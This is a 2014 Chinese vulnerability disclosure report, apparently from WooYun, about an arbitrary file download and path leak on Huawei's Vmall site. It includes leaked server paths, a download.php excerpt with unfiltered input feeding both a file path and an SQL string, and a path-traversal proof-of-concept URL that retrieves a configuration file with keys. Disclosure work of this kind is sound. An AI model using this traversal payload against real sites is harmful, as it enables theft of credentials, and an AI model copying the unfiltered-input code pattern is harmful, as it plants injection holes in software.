华为商城任意文件下载+敏感数据泄漏

漏洞详情

披露状态:

2014-04-10: 细节已通知厂商并且等待厂商处理中
2014-04-10: 厂商已经确认,细节仅向厂商公开
2014-04-20: 细节向核心白帽子及相关领域专家公开
2014-04-30: 细节向普通白帽子公开
2014-05-10: 细节向实习白帽子公开
2014-05-25: 细节向公众公开

简要描述:

华为商城文件下载+数据库信息泄露+路径泄露。

详细说明:

先是两枚路径泄露:

http://zh.ui.vmall.com//source/include/misc/misc_ranklist_index.php
Fatal error: Call to undefined function loadcache() in /home/emo/data/www/source/include/misc/misc_ranklist_index.php on line 2
http://activity.vmall.com/source/include/misc/misc_ranklist_index.php
Fatal error: Call to undefined function loadcache() in /home/emo/data/www/source/include/misc/misc_ranklist_index.php on line 2



download.php代码分析:

header("Content-type: application/octet-stream");
$filepath = "./resource/".$_GET['filename']; //直接使用了参数,没有过滤。
//......
$query = DB::query("SELECT filename FROM ".DB::table('emotion_download_restore_file')." WHERE filepath='".$filepath."'");
if ($archive = DB::fetch($query))
{
$filename = $archive['filename'];
}
//......

漏洞证明:

文件下载POC:http://zh.ui.vmall.com/download.php?filename=../config/config_ucenter.php

clipboard.png



能猜解很多文件:

clipboard.png

包含了很多敏感的key。

修复方案:

文件要过滤。

版权声明:转载请注明来源 矿主@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-10 11:46

厂商回复:

修完openssl的洞,接着修这个,苦逼的小伙伴辛勤劳动中。

最新状态:

暂无


漏洞评价: